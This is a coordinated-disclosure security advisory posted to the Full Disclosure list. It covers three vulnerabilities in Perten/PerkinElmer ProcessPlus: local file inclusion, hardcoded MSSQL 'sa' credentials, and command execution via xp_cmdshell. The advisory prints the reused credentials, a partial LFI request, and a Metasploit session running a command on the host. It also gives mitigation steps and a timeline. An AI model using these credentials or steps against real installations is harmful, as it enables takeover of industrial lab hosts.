[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
- From: Thomas Weber via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Date: Mon, 22 Jul 2024 21:05:57 +0000
CyberDanube Security Research 20240722-0
title| Multiple Vulnerabilities
product| Perten Instruments Process Plus Software
vulnerable version| <=1.11.6507.0
fixed version| 2.0.0
CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
impact| High
homepage| https://perkinelmer.com
found| 2024-04-24
by| S. Dietz, T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
| https://www.cyberdanube.com
Vendor description
"For 85 years, PerkinElmer has pushed the boundaries of science from food to
health to the environment. We’ve always pursued science with a clear purpose –
to help our customers achieve theirs. Our expert team brings technology and
intangibles, like creativity, empathy, diligence, and a spirit of
collaboration, in equal measure, to fulfill our customers’ desire to work
better, innovate better, and create better.
PerkinElmer is a leading, global provider of technology and service solutions
that help customers measure, quantify, detect, and report in ways that help
ensure the quality, safety, and satisfaction of their products."
Source: https://www.perkinelmer.com/
Vulnerable versions
ProcessPlus Software / <=1.11.6507.0
Vulnerability overview
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
A LFI was identified in the web interface of the device. An attacker can use
this vulnerability to read system-wide files and configuration.
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations.
In combination with 3), this allows an attacker to fully compromise the host.
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user "sa" to connect to the database. Access to this
account allows an attacker to execute commands via the "xp_cmdshell" procedure.
Proof of Concept
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
The LFI can be triggered by using the following GET Request:
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
This example returns the content from "C:\Windows\System32\drivers\etc\hosts"
of an affected installation.
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
Analysis across multiple installations show that the configuration file
"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:
<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"
appid="Perten.OPCDA.Server" loglevel="info"
These credentials "sa:enilno" were re-used in all reviewed installations.
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The application uses the "sa" user to authenticate with the database. By using
Metasploit an attacker can execute arbitrary commands:
msf6 auxiliary(admin/mssql/mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting
---- ---------------
CMD dir
RPORT 1433
TECHNIQUE xp_cmdshell
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against
[*] - SQL Query: EXEC master..xp_cmdshell 'dir'
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
Update to version 2.0.0.
Restrict network access to the host with the installed software. Change the
default credentials of the database in the config file and the database itself.
CyberDanube recommends Perten customers to upgrade the software to the latest
version available and to restrict network access to the management interface.
Contact Timeline
2024-04-29: Contacting PerkinElmer via dpo@xxxxxxxxxxxxxxx.
2024-05-13: Vendor asked for unencrypted advisory.
2024-05-16: Sent advisory to vendor.
2024-05-22: Asked for status update. No answer.
2024-05-28: Asked for status update. Contact stated that they are working on a
2024-06-10: Asked for status update. Contact stated that all issues should be
fixed by end of month. Local file inclusion should be fixed in
version 1.16. Asked for a release date of version 1.16. No answer.
2024-07-13: Asked for status update.
2024-07-15: Contact stated, that all three issues have been fixed in version
2.0.0 which have been released on 2024-07-11.
2024-07-16: Asked for a link to the firmware update release.
2024-07-17: Set release date to 2024-07-22.
2024-07-22: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2024
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/